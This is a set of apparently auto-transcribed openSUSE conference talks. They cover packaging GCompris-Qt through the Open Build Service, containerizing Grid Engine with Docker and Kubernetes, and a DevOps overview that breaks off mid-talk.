software to end users, you will have to find a home for your project. And then we call that as a develop project because one of its use any software factory need to have this repository. We have a number of them that is well defined as develop project, and you can only submit package to factory if you are present inside one of those. Perhaps a problem for a newcomer is find this develop repository. We have a lot. And it's not that easy to know if my package is a bit of Python, but I have C, but in fact I am a game, or can I be an education program, a health program, and so on. So finding the home on OBS, I don't have the right tool to do that. Perhaps asking a mailing list telling them, okay, I'm packaging this. This is mainly doing that. What is the best develop repository I can choose? Your dependencies can reside on another repository. In my case, for example, box2d was a pure library C++, she goes there, and QML box2d was more related to Qt, so it goes to Qt repository. Gcompree goes to education because the old version was already there. But then you will have to, and a different way of life on OBS. I would say normally it should have been, but not all develop repository are similar. So perhaps you will find a home, but inside this home, the maintainers want to still build for a whole slas things, and your package will have to build for those target too. I guess actually most of the things are getting better. Everything starts to be normalized, but then you will have to deal with the way how the maintainers of the repository want to have their software done on this. So finally we can start the real work. And so we will write the spec file, which is our receipt of how the software will be built from where come his sources, what kind of license is applied and so on. We have great tool for that, OSC, which is our main common line tools and K-Pack to create the package. And then you can use simple editor like VI. If you use VM and create the spec with VM, it will automatically feel a nice empty template for spec file for you. So the main rubric will be done by the way we have package at OSC. Once you have the spec file, you will start to build the package. It's nice to see if it's built, it will move. Then we can use again OSC common lines. We can build both way inside a VM. So locally, but inside a VM, it is exactly the way OBS will build the package, but you can also build with Siege root. It can help perhaps during debugging the build of the package because it will be more easier to go to the Siege root and understand why it doesn't find the files that it should or library or whatever. So our tools for building. We have the Bible, go to the Wiki. Normally everything is there and point to the different kind of packaging we can have like, Python, Perl and so on. You will have to set up your own OBS. Mainly it's done automatically when you create an account on OBS. And you will have to install, configure your OSC common line. I would like to insist on the fact that when you start to build something, try to stick only to one platform and one architecture. If it doesn't build for this, for example, Temple with 64 bits, you don't have to care about S390 ARM platform and lib version. It first gets the software build at least on one platform and one architecture. Why I'm saying so? Because we have to be a bit citizen and collaborative on OBS. It's a wonderful system we have. There is most than 800 workers. But we build a number of projects which hosts a huge number of packages in an household number of repositories. And this is still growing. So when my friend Dominic is rebuilding, for example, factory for the new GCC7, OBS will be full here during four or five days. So there is no that much power on OBS. So save your name and build locally. That's why we can build locally. It's quite easy. And for example, G-compre on OBS is building 200 seconds. Locally I build it for almost 100 seconds. So it's two times faster. I don't have to wait on OBS to see if it builds or not. At least when I'm developing. My last step is, okay, now I send all my changes to OBS and check if something breaks for one of the platforms, but not before. So yes, try to limit the number of architecture you can see. So it's come a time when I get finally my first essay. Wonderful. OBS accepted in education. And G-compre is finally available. And I start to advertise the package to some friends that have children to test it. And then I get quite quickly some news from them. The package doesn't work. It stopped, but nothing appeared on screen and something like this. And I was quite worried because I tested locally on my machine and it was working. And in fact, the gag was that I miss some requirements for the runtime. So don't get dropped like me. Never use your Dev machine when you test your package. Build from scratch a new VM for that. And if you are using KDE like me, then try to put GNOME 3 on this machine. But exactly what happened, because my friend Nicola was using GNOME 3 and my package was missing some Qt5 requirements to make it work on different platforms. And I have almost all library installed on my CropSync. So try to trick your package like end users will do one day or another. So it will work it. So I would like to thank Nicola to repel the bug and test the package. And Fabian worked from a KDE maintainer team that helped me to say, hey, you know, no, you need this requirement to make those library, Qt5 library available to any users. Then after that, when you will have your package on OBS, you will perhaps get some improvement from people's outsides. That was the case. Jan proposed to split the voice outside of the main package so the voice doesn't get rebuilt. So any time there is a new dependency changes or something like this, G-compreqt will be rebuilt. But if we keep the voice, which is 300 megabytes inside this package, each time the source package will contain the voice. And so we will multiply the data so the voice gets in a no-arch, no-build package which mainly will stay to rebuild one version. So you will have to manage those changes, proposal by others, and work together, which is a good way to learn for. So everything was perfect. The software exists. The user can install it, but no. This is a real screenshot of a user installation. It has 61 repository available for OVNCES. And this hell we want to fix it. So the next step will be to, OK, why doing the factory submission effort? Those results start one year ago to say, yeah, we should not impose to users to add additional repository. Our repository are for development. Repeat after me. They are for development only. So the last step was, OK, let's move that package to Leap. It means submit dependencies until they are accepted. And the software and the data voice should be easy now. In fact, not. A few minutes after the submit, in fact, the submission was refused by one of our reviewer both about a broken license. The voice package has no proper license, in fact. And upstream have to fix that. So I open a bug and work with them until they are recontact. Everybody that has contributed to the voice for JCompre and fix the license to be able to relicense in one unified license. And now they have a guideline that says, OK, if you want to propose a new voice for JCompre, it is under this license and nothing else. So I resubmit. OK, that's perfect, review in progress, time pass. I was a bit busy, but yeah, time pass, time pass, and 42.2 was released. In fact, the package goes to a dead end in some review in the legal queue. And at that time, Haskell package come with 3,000 new package inside the legal queue that has to be reviewed to and something like this. And my poor JCompre queue was a bit lost inside this dead end. So with the help of some friends and contacting factory maintainer to ask why it's still inside this queue when there is no more reason, it finally gets accepted to inside Tumblr with. So the Leap Boat asked me if I want to bring that package to Leap for 42.3 and then for the Leap, I say yes. And everybody now can enjoy JCompre on this computer, especially open to this one. And then what has to ask if you have questions, kind of sharing, there is a number of talk during the events that share to some minus the same problem or the same way, but if you start by doing some, I would say non-compiled software, it quite be easy. Proposing software in parallel, Python or I would say no, perhaps not. But some others, it's starting slow is quite easy. So don't get afraid about that. It was an exception. Question sharing. I guess the package, the dependencies was made in less than 10 days, not working all day on it, but just on a spare time. Then the first submit to education take, I guess, four hours. I submit that on the evening and morning it was accepted or something like this. We fix a bug in less than two days. Then after that, I would say the two dependencies take less than four days to go inside factory and tumbleweed. So that was easy. But then the G-compry and the voice with reject for the legal queue, then upstream take at least one month and a half to fix every voice because they have to contact any authors they have. This was something like 40 people to contact. This takes a bit of time. And then release a new version, we agree with that we will wait the O17 version to bring the new license and the new thing. So we repackage it, so submission to education gets accepted and submit. And then the review queue was stuck during two months. But because I was busy, I was not pinging every time. I know that our legal review is really the most boring things you can have. So I'm happy to say that we will have perhaps soon an open source boat. I hope that we can be able to propose that as services. So upstream we'll be able to send the tar to the boat and get a summary of the mess of license they can have. So it will help during the first submission to factory. But then yes, I was a bit worried that we I miss the 42 version. I could make the effort to create a maintenance request to add the package afterwards. But then 42.3 was not that far from November until July. I said, I don't know if it's really worth the effort. So it's still available inside the repository education. Even if you don't have to use repository, but after July it's okay. Any other question? So thank you very much.
Whenever you are curious about how sources become an installable software in Leap without additionnal repository, or think about contributing to openSUSE project with some packaging stuff, this talk will retrace the journey of gcompris-qt package from its upstream source to the final package that will be natively available in openSUSE Leap 42.3. I will explain in details the different steps to follow, how to do that, and some receipts against traps. At the end, you will have a good overview of what means get a package to Factory. You also will have a step by step roadmap to make your first contributions.
10.5446/54480 (DOI)
Welcome everybody. So I will talk about how to bring your application or your workload from bare metal to the cloud. So I'm pretty lucky that at least a couple of people joined. So a couple of seconds, only one guy was here. So I was a bit afraid if nobody will come. Okay. This will be the agenda of my talk. So I will do a short introduction, which in the end means who am I, what's my background of that topic. I will give you really just a couple of words how to dockerize your application, how you can bring your docker image into the cloud, which means in my case, to Kubernetes. At the end, we will do a short demo. So you will see how to generate all these files and how to bring that in a running Kubernetes cluster. And there's always question and answers. Who am I? So my name is Stefan Haas. I'm Senior Software Engineer at Univer Corporation. This is a small American company. So I'm a former SUSE employee, but this is meanwhile nine years ago. So I brought my diploma thesis and the yes team back then. After that, I started to work for Sun Microsystems later for Oracle due to acquisition. So and I was part of the development team for Grid Engine. This is also meanwhile the main product of my current company. So and the Grid Engine will be the test object for this talk. So we will try to containerize Grid Engine and bring that into the Kubernetes cloud. My current main focus is NavOps command. This is a product, though this is more or less a scheduler and policy management system for Kubernetes. So we are exchanging the stock scheduler of Kubernetes. But that's another topic. First of all, just a small introduction what Univer Grid Engine is so that you have a bit of an overview what we want to get into the cloud. So UGE, so the abbreviation is a batch queuing system. Some of you might remember it as Sun Grid Engine or Oracle Grid Engine. So it's all the same product. So it's a batch queuing system. Or if you want a grid computing cluster software or somebody, some folks call it distributed resource management system. So whatever you want. The main parts in this architectural overview are the UGE, the Grid Engine master. The master is responsible for all incoming requests by the user like QSAP, which means submitting a job into your batch system. Or if some administrator wants to configure it via QConf or stuff like that. And also everything goes to the master. The master is also responsible for scheduling the jobs and for the actual dispatching of the incoming jobs to the execution demons. And the execution demon is actually the second part we need to containerize. And the execution demon is actually responsible for really executing your workload and for monitoring the job on your Informatimes bare metal machine. So see as again these are the two components we want to bring into the cloud. So we will end up with just one image which includes the master as also the execution demon. But you will see how at boot up time of this container it will recognize what it has to start and run at. So first of all I want to start on how you can dockerize your application or your workload. So first of all we do not create containers, we create images. So what's the difference? Image is let me say the standalone and executable package which includes everything we need to run our application. And the container on the other hand, so this is the real runtime instance of that image. So usually by default if you do not do anything fancy container is completely isolated from the host environment by default. If you want to create a docker container or a docker image you have to create a manifest or a recipe. In the docker world you have to create a docker file. So a docker file defines what goes inside your container. So you can set access to resources like network interfaces which are usually not available from outside of the container. For example you map some ports, port 80 if you want to have some engine X instance or something like that. You have also to specify what files you want to copy inside your container. So first of all we need to copy our application inside of the container. So let's have a look at the real world example. So if you're talking about grid engine we want to see that. So in the first line you say what image you will base on. So as this is openSUSE conference and this is a real world example so we are running that at customers. Our grid engine image on openSUSE just as a bit of a background we choose that first of all because I'm openSUSE member and second of that the openSUSE image is way smaller than most of the competitors. So the base openSUSE image which just includes 42, we are using 42.1 is about 100 Mac. If you compare it with Santos or something like that you're at 150 or even 200 Macs. So you have to say the maintainer, this is in this case I am. So we are running commands. So for running grid engine in that container and for later on running workload in that container which means workload in the meaning of workload which runs as grid engine jobs. I'm installing a couple of additional packages. In this case we are installing SSSD, VI which is needed for the configuration of grid engine and we also need Java because our REST API in grid engine is written in Java. After that we clean all the temporary files from zipper. We define a working directory so this means the working, the current working directory which you get when you start up your container. I copy a bunch of files into that working directory so this is the schedule a configuration for grid engine details which are not that important. We are copying this one is important, wrapper script and renaming it to UGE. This will be later on our so-called entry point. The entry point is this process or script which gets executed when you start your Docker container without any additional command. So if you do a Docker run image name it will start this entry what do you state here as entry point. As soon as this entry point script or application process stops your container will automatically also stop. You can also as you have seen here with zipper a couple of I do here also a couple of run commands so I am installing here for example an additional RPM which is not available by default in any of the repositories. And here this is also this is another interesting thing I have to expose a couple of ports. So as said usually no port of a container is available from the outside of the container. So I have to expose the ports for my Q master process said my execution demons can communicate with the Q master. I have to expose this port which is responsible for the execution demon and the last one is the responsible port for my UGE REST interface. Let's go back to the slides. So if you want to generate and test your image you simply have to do a Docker build dash t dash t means you give it a tag and a name and you have to say where Docker will find your Docker file. After that you simply can execute the Docker images and you hopefully will find your application something like that with the tag. If you do not add a tag it will automatically do call it latest with a certain image ID. So I will not show you how to build the Docker image because at least in the case of grid engine it takes about 10 minutes to build all that stuff it has to grab to complete. Open SUSE image which is about 100 meg and install all this additional software. And after that you can locally execute your container via Docker run your app. And again this will just start inside of your container the application you configured as entry point. So but if you now we have a Docker image that's okay but we want to have a cluster of grid engine nodes and you do not want to go to every of your nodes and install the Docker image and start and boot it up by hand or manually. If you would do it like that there is no meaning in doing it in a Docker image. So for that we are using Kubernetes. So what's Kubernetes? This is an open source system held by the CNCF the cloud native foundation console or something like that originally invented by Google. It's a tool for automating deployment and management of containerized applications. So not only Docker but I think so at least what I the customers we have I think at least 95% are running Docker images when it was in Kubernetes and nothing else. Kubernetes follows a similar to grid engine the master slave architecture so the components can be easily divided into those who manage the individual nodes. The most important part is the so-called kubelet which is responsible for starting the pots. So pot I will tell you later what this is but to be easy this is the container itself and we have the Kubernetes master which includes the stock scheduler and for example the et-cd instance is a key value pair server instance for storing all the configuration of Kubernetes. So to do a short overview of the namings in Kubernetes so that you know what I'm talking all about the first thing which I just said a couple of seconds ago is a part. This is the basic block of Kubernetes so it's more or less a process in your Kubernetes host node. A pot encapsulates a container or more you can have running as many containers as you want in a container in a pot as also resources like storage. So we will see that in our example in grid engine we need additional storage for our demons. And you can also encapsulate resources like network interfaces and stuff like that. The next thing I want to shortly talk about is controller. So controller in Kubernetes is easy set, concept or manifest how you want to deploy your pots in a cluster. For example, I choose for the execution demon a replication controller and the replication controller is responsible. So you say I have this execution demon, you have a template of a pot, this execution demon wants to have a storage. He wants that this container wants to have the storage mounted to this and that pass. And the controller is responsible for how many of them you want to have for example five replicas and the controller is responsible that you always have these five controllers running in the system. So in case of a replication controller. So if one of the containers departs dies, a replication controller will automatically start up a new one. If you downscale a replication controller, you do not want to have five anymore, you are okay with three. It will automatically kill two of them. The last thing I want to shortly introduce is the service. Pots in the Kubernetes world, they call it they are ephemeral or mortal. This means they are born and when they die, they do not get resurrected or stuff like that. So while each pot gets its own IP address, even those IP addresses cannot be, you cannot rely on those IP addresses to be stable over time. So a Kubernetes service is more or less an abstraction which defines a logical set of pots. You can have more pots in as a service and a policy by which to access these pots. So let's think on a multi-tier replication. So you have a web server database and you do not want to access a real instance, a real pot on your Kubernetes cluster so you want to access the service for all that stuff. So when it comes to bringing your Docker image to Kubernetes, first of all, we have to decide what controller fits best for your application. So here's another example, a demon set. So with a demon set, you can ensure that every node in the cluster runs an instance of your pot. And you have to prepare storage for your application. So we need to do that. So a storage in Kubernetes can be NFS, CFFS, Amazon EBS, and can be an Azure drive or something in the Google Cloud wherever you want. And it also can be a so-called host pass which simply means a local pass or local directory on your node, which is only for reasonable for demoing purposes. So again, real world example. First of all, I want to show you my demo environment. Unfortunately, the demo gods haven't been with me so I destroyed yesterday in the evening my CAS installation. So I have to fall back to Minikube. Minikube is a virtual machine which runs Kubernetes inside. So that's also the reason why I'm now relying on a local host pass. Usually I'm showing that stuff with an NFS server running as a pot. Okay. Nevertheless. First of all, we have to create a PV, so persistent volume. This is the storage provisioned by the administrator. Again, this can be NFS, whatever you want. The administrator has to say, okay, I have here an NFS share. This is mounted on this server. You can have access to this via this NFS server and there are 30 gigs of memory. We need a PVC. This is the persistent volume claim. This is the request for storage by a user. So a user usually does not care where his storage is. So a user does not want to know if this is on Amazon, if this is on Microsoft Azure, if this is somewhere in the Google Cloud, he doesn't care. The only thing he wants to, he says, okay, I need here five gigs, stuff like that. For the UT execution daemon, I choose a replication controller. Just for demoing purposes, usually you would say for a execution daemon, you would choose a daemon set, which means that you have one execution daemon per node in your Kubernetes cluster. But in a mini-cube environment, this doesn't make many sense. For the UT Q-Master, I choose a stateful set. A stateful set is pretty similar to a replication controller with the difference that a stateful set provides a unique identity to your pod. This means the first one will get called UG Q-Master-O, the second one, dash one, dash two, and so on and so on. Instead of if you do a replication controller, you get UG execution daemon dash, some arbitrary numbers and letters. Another good thing about the stateful set is that it provides a guarantee about the ordering of scaling and deleting. So as said, you can count on the numbers, and if you downscale your stateful set, you can get sure that the last one will get killed first. You cannot get your natural in case of a replication controller. Last but not least, we need a service. So in this case, we need a headless service, as we have only one Q-Master running. And this headless service is tied to this stateful set, which means we get a DNS entry directly for this UG Q-Master pod. So we can connect from the outside to our UniverGrid Engine cluster. So we can do a Q-SAP or Q-COM even from outside of Kubernetes if you want. Let's go back to the examples. So let's start with the persistent volume. Again, this is what you as an administrator have to create. So you have to create or prepare some storage that your pods or controllers or whatever can rely on. So this is a pretty simple example. You can get that as sophisticated as you want. So first of all, I say you can do your configuration in Kubernetes, either via JSON files or YAML. So in my opinion, a YAML file is more easy to read, so I choose that for the demonstration. So the first line says, OK, this is all about the persistent volume. In Kubernetes, you always have to say which API version this persistent volume belongs to. You have to give it a name for sure. And in Kubernetes, you can add labels. These are just simple key value pairs where you can do sort and ordering later on. So there is nothing special about that in Kubernetes itself. It's just for monitoring and stuff like that. So I said, OK, this is the type local. You have to specify what kind of persistent volume this is. So I give it a capacity of 10 gig of memory. You have to specify the access mode. In this case, I said, read, write many. This means that from many different nodes, you can read and write at the same time to this persistent volume. And I have to say what kind of persistent volume this is. So in this case, it's a host pass, which means it's a local directory. On the node, the persistent volume gets created on. So if you would have an NFS server, you would have, to say here, NFS. Here you would have something like a server entry and stuff like that. This is the persistent volume claim. This is the thing the user will create. The user will rely on. So again, I said it's a persistent volume claim, the kind. The name is UGE claim. I have the same access mode. And I want to get three. So I need for my workload, my application, my pod, I need to have three gig of available. So this is my request. This would be all about the storage. So let's dive into the controllers. This is the replication controller responsible for the execution daemon. Again, you have to give it a name. You have to say what it is at all. This is the specification for the replication controller. So when creating that replication controller, it will boot up no pod so far. So you could also say I want to have a boot up 10 or something like that. Then you have to specify what container you want to run inside this pod. Or containers. Again, you can have multiple containers running inside that. So in this case, we have only one container running inside. I named that container execution daemon. You have to say where Kubernetes can download this image. In my case, I have it lying on the Google Cloud. You have to, you can additionally add a so-called pull policy. So in my case, it says if it's not present on the node you want to boot up or to start this pod, please go to this direction and download it. You also can say something like always. In this case, it will always go to this pass and look up if there is a new version of your application. You can down pass environment variables directly inside of your container. So in my case, I have a couple one. So this one is the first one, the UGH type. This says what the container should start inside. So in this case, it should start an execution daemon. This is just for demoing purposes. So if this wouldn't be O, so the UGH deletion timer, it would cause the pod to destroy itself. For example, you don't have for 10 seconds workload on your execution daemon running. And I want to know inside the container in which namespace I'm running. So in Kubernetes, you can have different namespaces, which is a pretty basic and simple way to divide your, to cluster your Kubernetes cluster or to divide your Kubernetes cluster in different sections. For example, you have some development. You want to have a development namespace and you have additionally some for the production. You can also add lifecycle hooks. So in this example, I added a pre-stop hook, which means as soon as before the pod actually gets stopped or killed by Kubernetes, it should execute that command. So this command will only go to the Q master and say, okay, I will be not available in a couple of seconds anymore. And again, like in Docker, you have to say which ports should be accessible from outside of Grid Engine. Sorry, of Kubernetes. The last couple of lines here says, okay, I want to have, I want to mount a pass inside of my container and this container, this pass should be from the persistent volume claim we just created. This is the so-called UG claim. So this one should be available at all my later, at all my execution human pods. So this is the stateful set for Q master. It's pretty the same except that it's a stateful set and I want to boot up one replica at the time. And there are a couple of environment variables missing which are not necessary for the Q master. But again, I want to have a shared directory between the execution human and the Q master. So you can see here, this is the same persistent volume claim. Both of them are available. So this claim will be, it should be available in my Q master pods as also in my execution human pods. This takes a while. I have to boot up my mini cube cluster. It should take a couple of seconds. So I created a script which will add all these YAML files to my Kubernetes cluster because we have here four different five. We have the service also. And it's always the same, you do a cube control, create dash F and dish YAML files. So we do not have to look at that. So okay, mini cube is up and running. So there are no pods running so far. So let's create our UG cluster. So as you can see here, the first what I did, I created this persistent volume. After that, I was able to create my persistent volume claim, started up my UG Q master. So I created my stateful set for the Q master and I created replication controller. So now we should have one Q master replica running but no execution daemon. So we have one Q master running here, one of one. So let's add a couple of execution daemons. Okay. So it says, I scaled my stuff. Now you can see that we have three execution daemons up and running. And now we can go inside of the Q master just to demonstrate that they are really up and running and that we really have a running grid engine cluster. So for those who are familiar, maybe this grid engine so you can see here, I'm on my Q master host and I have here three different execution daemons running inside which are exactly the pots we just booted up here in my mini-cube environment. So that's what I wanted to show you. Are there any questions? Don't see anybody? Okay. Thank you. Okay. Thank you. Okay. Thank you. Okay. Thank you. Thank you. We'll come back to you in about the next video. Bye.
Kubernetes is an open source project for orchestrating containerized applications. But how to containerize your workload? How to bring your containerized application into Kubernetes? This talk will show how we transferred our application to Kubernetes. - This includes containerizing the application (based on an openSUSE docker image) - How to expose your application services via Kubernetes. - How to create a shared file system for all Pod belonging to your application via Kubernetes. I will show how to do that plus a demo on a running Kubernetes System provided by SUSE CaaS.
10.5446/54482 (DOI)
My name is Craig Gardner and I have listed here two different roles that are significant as it applies to this presentation and to this particular conference. I am an engineering manager at SUSE and in that role I lead a team that produces what's known as SUSE Enterprise Storage based on CEPH, the open source project called CEPH. And the second role that I have listed here is that I am an adjunct instructor of computer science at a university nearby where I work. And in those kinds of experiences my students often tell me that it's great to have an instructor at the university who has real life experience in the things that are being taught. And I value that and I think my students value that. And when I am teaching at university I usually have 40 or 50 students there attending but they're there because they have to be and you're here today because you at least are presumed to want to be here to talk today. I picked up this great screenshot, this what do you call that, background screen. What do you call that, background, yeah it's a background. So I have no idea who's responsible for it. I googled it at one point looking for something interesting and I thought that's beautiful and I need to use that because I've got this Game of Thrones thing going on. There's a nice dragon represented with the SUSE logo here and I just have a few slides that just for, I think I'll just read through all of my slides and that'll be the most interesting way to go through this. And yes Mark I really don't have 413 slides that's a joke so I wanted to make sure you're. The subtitle here that I have is having to do with trying to do the right things. And as an analog to this I come to Nuremberg with some very comfortable frequency. I love coming and visiting Nuremberg to do our SUSE headquarters is here in Nuremberg. So I have the great privilege and opportunity to come and visit here with some regularity. And when I do I also like to explore the city. I like to find different places that are interesting and I like to try to go different routes to the same place from time to time. And as a case study to apply to this as I was getting ready to come here on the first day of the open SUSE conference I got lost. And for the most part on purpose right I wanted to try and find a different way of getting to the place where I was going. I knew where I was going and I chose to take a different route to get there and I ended up getting lost. I could eventually arrive at the right place and I had all the right intentions and all the tools at my disposal to do the right thing and I did it in the wrong way. And of course I did eventually get where I needed to go and that was a good thing. But sometimes we make decisions with good intentions and knowing where it is that we want to go but we make mistakes along the way. And a good team and a good organization learns from those mistakes and improves upon those kinds of things. So my point here is that as I share with you some of my thoughts both applied and academic about DevOps. I hope that you will take what I have as not mean spirited but encouraging and likewise enlightening. So as we talk about DevOps here for a moment I ask myself what does DevOps have to do with an open SUSE conference and maybe it doesn't. But I often in my academic and professional experiences have conversations with a vast amount of people that don't understand open source. Yeah, you too, right? In the classroom I am often trying to teach students about open source, about open source methods, about open source values and yet the questions persist until they get some more practical experience with open source. Their questions are limited to open sources for example just those discrete components of the lamp stack, right? Open source is just Linux and a little Apache and a little database and then some kind of application and it isn't until they start to see beyond those discrete components that there is really a broader, more valuable purpose to open source ideas and open source methodologies. But the same thing happens when I have conversations even with those kinds of customers and those kinds of organizations that deal with SUSE and Red Hat and other open source valuing companies. They don't understand what open source is intended to provide for them. So I want to try to apply this concept about DevOps through these consistent misunderstandings about what open source is intended to provide. As I talked today about DevOps we have a few victims or we have a few things that we want to make sure that we identify here and that is that DevOps is just as widely misunderstood as is the general topic of open source. I even got a recent notification in my email inbox from some group in the LinkedIn community. It happens to be the DevOps group in the LinkedIn community where someone had posted an article about how to become a DevOps. Because if there is some formula or some recipe to follow to become a DevOps, which was actually interesting how that was now known if I did that you become a DevOps by virtue of following this advice that came in this group. So there are many misconceptions about what DevOps is. So I ask you as people consider what DevOps is, is it a magic wand or a silver bullet or a golden hammer? And as we drive down to the purposes of the evolution of DevOps we want to try to economize the collaboration of all the parts involved in delivering a software solution. A textbook would tell us these sorts of things. DevOps is a practice of operations and development engineering participating together in the entire service life cycle, blah, blah, blah, blah, characterized by operations staff making use of many of the same techniques as developers. Well now that's where I think it becomes a more interesting discussion. The union of or at least the combining of the narrowing of the gap between operations and development. And perhaps if you have some experience with DevOps you will have seen a graph, a Venn diagram similar to this. This comes directly from Wikipedia as it tries to describe with great conflict what DevOps really is. It's this union of development and quality assurance and operations that is DevOps. Reality tells us some interesting things about it as people have put DevOps into practice and as people try to squeeze the value out of these principles of DevOps. We start to understand that as much as DevOps has a lot of hype, it's not really anything new. It's a process and though it sounds a little bit derogatory, it's just another process. But it's built upon a variety of very found, sorry, very sound foundational principles that have brought success to a variety of different software endeavors for many, many years. What's important to know is that DevOps as much as there is so much hype about it, it is not a silver bullet that solves all problems. But yes, DevOps surely the principles that are associated with it can work, can be made to be useful in your delivering software solutions when the conditions are right, when you've got the right people with the right attitude, with the right skills, where these people that you have that have the right skills are hardworking and are full of integrity and in lots of cases a lot of coffee. What do I mean when I say that DevOps is not necessarily new? Well, it's really an evolution of a long existing culture of trying to provide value through these principles known as continuous integration and continuous deployment. You've surely heard those before, but those are old antiquated terms. Let's go ahead and slap a new title on it called DevOps and we'll add a few extra things to it that I'll just mention to here as continuous foo, continuous monitoring, continuous updating, continuous bug fixing, continuous testing, right? All of these different continuous things. Does that mean that it's bad? Absolutely not. It's just that it's now a sexy way of trying to put these things together and a sexy way of getting these people together to deliver software values quickly, more agilely, and more effectively. It means simply more efficient collaboration amongst a variety of different entities. Well, what kinds of entities are we talking about? Yeah, it's different for different organizations, which is exactly what some process that implies agility is supposed to be all about, right? If it's an agile process, it should be able to be applied in a variety of different ways under a bunch of different circumstances and that's good. That's a good process. A good process that can accommodate some variability is a good process. You have lots of ways that these sorts of things are implemented. You have people that call it DevOps and ITOps and you even have the folks like at Google that have called this now WebOps. Yeah, that's good stuff, right? If Google says it's good and if Google gives it a title, then it's got to be the best thing ever, right? Well, some of our experts in this world that watch how these kinds of processes develop and watch how the people who are involved in these processes start to come together, you start to now assemble a lot of specialists that know an awful lot about an awful lot. But it becomes a Herculean kind of definition of what a WebOps engineer is supposed to be able to do, right? That WebOps engineer has got to be able to know everything about networking and has to have some knowledge about routing and has to know about all the different flavors of Linux and Unix that are involved and knows about caching and knows about this and knows about that and has to stop speeding trains with his teeth, right? Multi-disciplinary experts that in reality is kind of a Montgomery Scott saying, I got to make change the laws of physics, captain, right? That was terrible, wasn't it? That was a really bad Scottish accent. But you know that this becomes either an impossible task in the realms of the mythical or as you're trying to get people involved in this process who master all of these disciplines, you burn them out and they die and nobody wants that. How do we then make value out of a process that isn't new that continues to allow you to economize the collaboration of a variety of people with different skills, different aptitudes, different abilities? What does DevOps try to control? Well typically we talk about, historically we talk about, Web type applications. But that's not limited to that. In fact, I even had this great presentation from the app image guy, Simon Peter, brilliant who talked about how DevOps is very useful in terms of turning around each of the app images. When there's change, it can go through is DevOps process and validate and test and deploy these new app images on a fairly routine basis, a fairly frequent basis and in a substantial way, automated basis. It is intended to control the agility that's involved in all of the performance, scaling systems up, tearing them down when they're not needed anymore, getting the new code out as quickly as possible, at least the good code out as quickly as possible, and not being afraid to get code out there quickly that might have bugs, because you know you have confidence in your process, you have confidence in DevOps so that you can turn it around even more quickly if you find a problem. But sometimes that becomes a very difficult race condition. You don't want to be afraid to make mistakes, but mistakes look bad, you hurry to get something out as quickly as possible, you feel that your process facilitates that agility, you get something out that has now a new problem and it's a very rapid falling forward. Now I'm not trying to paint that as a bad thing, but it's something that needs to be controlled and managed. The DevOps processes want to control that flow of delivering value to the people that are using your software solution. What does it intend to fix? It's broken that DevOps has to be the sexy thing of today that everybody wants to do because it fixes all problems like a good golden hammer. Well it intends to fix poor communication and particularly that challenged communication that happens between development and deployment. And for the purposes of what it is that we're trying to fix, we typically lump the efforts of testing in with developing. But we know that you have to do testing from an ops perspective as much as you need to do testing in the dev functions. And it's important for us to not lose sight of that universality of testing. What DevOps wants to try to simplify and to enhance the collaboration of the testing efforts between the dev and the ops. So other things that DevOps wants to fix, it wants to fix the inefficiencies of handing the code over from the one side to the other. It wants to handle the inefficiencies of providing a feedback loop, both good and bad, of what's being experienced with the software solution. It wants to handle the conflicts that take place as a result of the inherent inefficiencies of that. And it wants to incorporate some sense of agility into the operations in the same way that developers have attempted to incorporate agile processes into their development practices. It's also a way, it is also an important addressing of inefficiencies that happen in terms of customers and trust. Of there being able to say, I trust what this software service is and I can give my trust as a result of the fact that there's not this conflict that happens between both development and operations. And there are lots of successful companies that do these kinds of things that use DevOps to their advantage that build trust in the teams that are producing these kinds of solutions. If you look at very highly successful people like eBay, they use a very DevOps oriented approach to how they release software. You look at Google, lots and lots of DevOps, web ops. That's their very specialized way of delivering value that everybody relies on. Everybody can count on. Google is never down. Google always gives you what it is that you need to have. And if eBay was ever down, how often would people lose confidence? How often would people start spending their money through eBay? How often would people start selling their stuff on eBay? Well there's some effectiveness that comes out of this, continuous integration and continuous deployment and continuous testing. If you've got the right people and you've got the right culture and if you've got the right product. The real problems that we have is not just an academic one. It's that you have the one side that doesn't trust the other. It's not just the trust that exists between a customer and the solutions provider. It's not just the trust between the customer and the solution itself, the software. There's the trust that has to take place and that is often the problem between what happens between development and deployment of the software solution. That IT manager that's supposed to deploy this software feels like the development process is absolute chaos. I never know what they're going to give me. I don't know if they've even tested the stuff that they're handing to me. I don't have any trust in what it is that they're handing to me on a routine basis. And not just that, I don't have any control over it. I can whine and complain to the dev team all I want. They don't hear me. They don't understand me. And nothing changes. But the same sort of thing happens from the dev side. They look at the operation side of the house and they say, I just write the code. I have no idea what those operations guys are doing with it. I don't even know if they're configuring it right. That's the reality of the kinds of things that are going on that DevOps says, we've got to fix this. We've got to bring those two together so that we don't have this mistrust. So DevOps as an ideology does these things. I'm going to skip over this slide, let you just ruminate on it instead of spending any particular time. But it allows you to collaborate more efficiently and effectively. But does that really mean that the process of DevOps makes your people collaborate better? Makes your people talk together better? No, it doesn't. It tries to facilitate it. It tries to make things easier. It tries to reduce the number of barriers that exist. But at the end of the day, it's the people that are associated with the process that do the collaborating and that do the communicating. So the process is at least trying to get those barriers out of the way and is trying to facilitate the means whereby that collaboration takes place. That's a good process. You have the kinds of things that a development team does listed here at the top. You've got the kinds of things that the operation team does with here at the bottom. And as you start to look at those, you start to understand that there are some inherent similarities. They are really largely the same thing. And so why is it that we can't get together on these things? Well, that's what DevOps wants to do. Because we're really doing the same thing, why can't we just do the same thing? And as you have the formalized definition of what is DevOps in terms of its process flow, you have these specific characteristics that are called out. You're going to code and then build and then test and then package, then release and then configure and then monitor it. And you all want to do this fairly quickly. You want to be able to have a quick pace, an agile pace. You want to be able to make changes quickly. You need to be able to do all of these things that matches the speed at which the demands for the software change. Have the speed of your delivery match the speed of the requested changes. It's not an easy thing to do. It's an interesting observation here as you look at this process flow and as my slide gives away, it looks kind of like a waterfall. And indeed, although DevOps wants very much to say, we hate waterfall, that's an antiquated process, we never want to have anything to do with waterfall, we're going to stick it to those old process guys. We're never going waterfall. The truth of the matter is, is that those waterfallish principles aren't necessarily a bad thing. And you want to make sure that you're doing things in sort of a deliberate flowing way that you can manage and that you can understand and that you can monitor and that you can improve upon. And that's what any good process is about. So instead of DevOps throwing the good of waterfall and the good of old well proven processes out, it's really just trying to refine those well intended and time proven processes like a waterfall process and just call it something cool that people can attach to and call it something that's agile so people can think that it's modern and make it as sexy as possible so that people will want to be associated with it. Again, I'm not trying to say that that means that DevOps is a bad thing, that it's a charlatan, that it's a disappointment. I'm not saying that at all. Let's just recognize what it is for what it is. So one of the really, really important details about DevOps is this principle of automation. Now 